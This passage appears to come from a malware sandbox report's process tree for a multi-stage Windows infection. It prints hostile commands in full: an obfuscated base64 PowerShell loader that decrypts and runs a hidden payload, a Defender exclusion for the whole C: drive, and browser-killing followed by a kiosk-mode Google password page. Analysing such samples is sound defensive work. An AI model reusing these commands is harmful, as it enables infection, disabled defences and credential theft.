                                                                                        • C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
                                                                                          5⤵
                                                                                          • Deletes itself
                                                                                          • Executes dropped EXE
                                                                                          PID:232
                                                                                          • C:\Users\Admin\AppData\Local\Temp\{1079e430-9f28-44b5-840d-93ee341c5859}\21174509.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\{1079e430-9f28-44b5-840d-93ee341c5859}\21174509.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot
                                                                                            6⤵
                                                                                            • Executes dropped EXE
                                                                                            • Checks for VirtualBox DLLs, possible anti-VM trick
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:23364
                                                                                            • C:\Users\Admin\AppData\Local\Temp\{c5e6931c-981e-4817-aca0-619ffa5a2c0c}\df43170a.exe
                                                                                              C:/Users/Admin/AppData/Local/Temp/{c5e6931c-981e-4817-aca0-619ffa5a2c0c}/\df43170a.exe -accepteula -adinsilent -silent -processlevel 2 -postboot
                                                                                              7⤵
                                                                                              • Drops file in Drivers directory
                                                                                              • Sets service image path in registry
                                                                                              • Executes dropped EXE
                                                                                              • Impair Defenses: Safe Mode Boot
                                                                                              • Loads dropped DLL
                                                                                              • Adds Run key to start application
                                                                                              • Writes to the Master Boot Record (MBR)
                                                                                              • Checks for VirtualBox DLLs, possible anti-VM trick
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              • Suspicious behavior: LoadsDriver
                                                                                              PID:23432
                                                                                    • C:\Users\Admin\AppData\Local\Temp\10428380101\e3be186656.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\10428380101\e3be186656.exe"
                                                                                      3⤵
                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                      • Checks BIOS information in registry
                                                                                      • Executes dropped EXE
                                                                                      • Identifies Wine through registry keys
                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      PID:2124
                                                                                    • C:\Users\Admin\AppData\Local\Temp\10428390101\UZSECGPC.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\10428390101\UZSECGPC.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:8008
                                                                                      • C:\Users\Admin\AppData\Local\Temp\{FF57463D-4388-4448-809D-386DAD5D2B14}\UZSECGPC.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\{FF57463D-4388-4448-809D-386DAD5D2B14}\UZSECGPC.exe -package:"C:\Users\Admin\AppData\Local\Temp\10428390101\UZSECGPC.exe" -no_selfdeleter -IS_temp -media_path:"C:\Users\Admin\AppData\Local\Temp\{FF57463D-4388-4448-809D-386DAD5D2B14}\Disk1\" -tempdisk1folder:"C:\Users\Admin\AppData\Local\Temp\{FF57463D-4388-4448-809D-386DAD5D2B14}\" -IS_OriginalLauncher:"C:\Users\Admin\AppData\Local\Temp\{FF57463D-4388-4448-809D-386DAD5D2B14}\Disk1\UZSECGPC.exe"
                                                                                        4⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:6168
                                                                                        • C:\Users\Admin\AppData\Local\Temp\{5D5EE4C3-65C1-4FA9-9E50-ADB12AC306EA}\ISBEW64.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\{5D5EE4C3-65C1-4FA9-9E50-ADB12AC306EA}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{3C7563BA-E0F8-4195-9764-016EE494C1D3}
                                                                                          5⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:9020
                                                                                        • C:\Users\Admin\AppData\Local\Temp\{5D5EE4C3-65C1-4FA9-9E50-ADB12AC306EA}\ISBEW64.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\{5D5EE4C3-65C1-4FA9-9E50-ADB12AC306EA}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{CA60D45B-6AA6-4581-82A7-F4C5D758A6BD}
                                                                                          5⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:9132
                                                                                        • C:\Users\Admin\AppData\Local\Temp\{5D5EE4C3-65C1-4FA9-9E50-ADB12AC306EA}\ISBEW64.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\{5D5EE4C3-65C1-4FA9-9E50-ADB12AC306EA}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{07E9D8C1-23CD-4E70-A519-1DCA942F9388}
                                                                                          5⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:9204
                                                                                        • C:\Users\Admin\AppData\Local\Temp\{5D5EE4C3-65C1-4FA9-9E50-ADB12AC306EA}\ISBEW64.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\{5D5EE4C3-65C1-4FA9-9E50-ADB12AC306EA}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{1441A837-DFE1-441B-8C7E-147FC6E94763}
                                                                                          5⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:9236
                                                                                        • C:\Users\Admin\AppData\Local\Temp\{5D5EE4C3-65C1-4FA9-9E50-ADB12AC306EA}\ISBEW64.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\{5D5EE4C3-65C1-4FA9-9E50-ADB12AC306EA}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{D356A3B6-17BB-421D-A0F2-F81B621B1AE1}
                                                                                          5⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:9292
                                                                                        • C:\Users\Admin\AppData\Local\Temp\{5D5EE4C3-65C1-4FA9-9E50-ADB12AC306EA}\ISBEW64.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\{5D5EE4C3-65C1-4FA9-9E50-ADB12AC306EA}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{3B4D0312-FE75-4083-905C-385D9F66809E}
                                                                                          5⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:9620
                                                                                        • C:\Users\Admin\AppData\Local\Temp\{5D5EE4C3-65C1-4FA9-9E50-ADB12AC306EA}\{38C49E83-05E9-4C6A-9256-6AA74482FDC5}\CamMenuMaker.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\{5D5EE4C3-65C1-4FA9-9E50-ADB12AC306EA}\{38C49E83-05E9-4C6A-9256-6AA74482FDC5}\CamMenuMaker.exe
                                                                                          5⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:6320
                                                                                          • C:\Users\Admin\AppData\Roaming\Uj_debug_v5\CamMenuMaker.exe
                                                                                            C:\Users\Admin\AppData\Roaming\Uj_debug_v5\CamMenuMaker.exe
                                                                                            6⤵
                                                                                            • Executes dropped EXE
                                                                                            • Loads dropped DLL
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                            PID:9800
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              C:\Windows\SysWOW64\cmd.exe
                                                                                              7⤵
                                                                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:11848
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              C:\Windows\SysWOW64\cmd.exe
                                                                                              7⤵
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:23408
                                                                                    • C:\Users\Admin\AppData\Local\Temp\10428400101\Rm3cVPI.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\10428400101\Rm3cVPI.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:9524
                                                                                    • C:\Users\Admin\AppData\Local\Temp\10428410101\23cf115f5f.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\10428410101\23cf115f5f.exe"
                                                                                      3⤵
                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                      • Checks BIOS information in registry
                                                                                      • Executes dropped EXE
                                                                                      • Identifies Wine through registry keys
                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:10768
                                                                                    • C:\Users\Admin\AppData\Local\Temp\10428420101\PJ7KEk9.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\10428420101\PJ7KEk9.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of SetThreadContext
                                                                                      PID:11532
                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                        4⤵
                                                                                          PID:11684
                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                          4⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:6644
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10428431121\izP7K34.cmd"
                                                                                        3⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:17824
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10428431121\izP7K34.cmd"
                                                                                          4⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:23144
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
                                                                                            5⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            PID:17600
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
                                                                                              6⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              PID:13280
                                                                                      • C:\Users\Admin\AppData\Local\Temp\10428440101\43a8613494.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\10428440101\43a8613494.exe"
                                                                                        3⤵
                                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                        • Checks BIOS information in registry
                                                                                        • Executes dropped EXE
                                                                                        • Identifies Wine through registry keys
                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:23116
                                                                                        • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\10428440101\43a8613494.exe"
                                                                                          4⤵
                                                                                            PID:15804
                                                                                        • C:\Users\Admin\AppData\Local\Temp\10428450101\3a97588cab.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\10428450101\3a97588cab.exe"
                                                                                          3⤵
                                                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                          • Checks BIOS information in registry
                                                                                          • Executes dropped EXE
                                                                                          • Identifies Wine through registry keys
                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:17952
                                                                                          • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\10428450101\3a97588cab.exe"
                                                                                            4⤵
                                                                                              PID:24432
                                                                                          • C:\Users\Admin\AppData\Local\Temp\10428460101\128e6cc54e.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\10428460101\128e6cc54e.exe"
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of SetThreadContext
                                                                                            PID:24320
                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                              4⤵
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:24356
                                                                                          • C:\Users\Admin\AppData\Local\Temp\10428470101\3448720498.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\10428470101\3448720498.exe"
                                                                                            3⤵
                                                                                              PID:15856
                                                                                            • C:\Users\Admin\AppData\Local\Temp\10428480101\eceb20f93c.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\10428480101\eceb20f93c.exe"
                                                                                              3⤵
                                                                                                PID:8648
                                                                                              • C:\Users\Admin\AppData\Local\Temp\10428490101\91be916e70.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\10428490101\91be916e70.exe"
                                                                                                3⤵
                                                                                                  PID:17572
                                                                                                • C:\Users\Admin\AppData\Local\Temp\10428500101\fcdb5de9f8.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10428500101\fcdb5de9f8.exe"
                                                                                                  3⤵
                                                                                                    PID:13612
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10428510101\581a72948c.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10428510101\581a72948c.exe"
                                                                                                    3⤵
                                                                                                      PID:14264
                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                        taskkill /F /IM firefox.exe /T
                                                                                                        4⤵
                                                                                                        • Kills process with taskkill
                                                                                                        PID:14416
                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                        taskkill /F /IM chrome.exe /T
                                                                                                        4⤵
                                                                                                        • Kills process with taskkill
                                                                                                        PID:3900
                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                        taskkill /F /IM msedge.exe /T
                                                                                                        4⤵
                                                                                                        • Kills process with taskkill
                                                                                                        PID:7488
                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                        taskkill /F /IM opera.exe /T
                                                                                                        4⤵
                                                                                                        • Kills process with taskkill
                                                                                                        PID:24236
                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                        taskkill /F /IM brave.exe /T
                                                                                                        4⤵
                                                                                                        • Kills process with taskkill
                                                                                                        PID:17468
                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                                                                        4⤵
                                                                                                          PID:17412
                                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                                                                            5⤵
                                                                                                              PID:17396
                                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2028 -prefsLen 27099 -prefMapHandle 2032 -prefMapSize 270279 -ipcHandle 2108 -initialChannelId {df4cfc3e-58af-480c-bf8a-c1c339c62fb3} -parentPid 17396 -crashReporter "\\.\pipe\gecko-crash-server-pipe.17396" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
                                                                                                                6⤵
                                                                                                                  PID:11344
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10428520101\32061810fa.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10428520101\32061810fa.exe"
                                                                                                            3⤵
                                                                                                              PID:17320
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                          1⤵
                                                                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                          • Checks BIOS information in registry
                                                                                                          • Executes dropped EXE
                                                                                                          • Identifies Wine through registry keys
                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          PID:5184
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2368 -ip 2368
                                                                                                          1⤵
                                                                                                            PID:5952
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4948 -ip 4948
                                                                                                            1⤵
                                                                                                              PID:4784
                                                                                                            • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                                                                              1⤵
                                                                                                                PID:4852
                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                                                                                1⤵
                                                                                                                  PID:3964
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
                                                                                                                  1⤵
                                                                                                                    PID:6068
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
                                                                                                                    1⤵
                                                                                                                      PID:5260
                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                                                                                                      1⤵
                                                                                                                        PID:2856
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                        1⤵
                                                                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                        • Checks BIOS information in registry
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Identifies Wine through registry keys
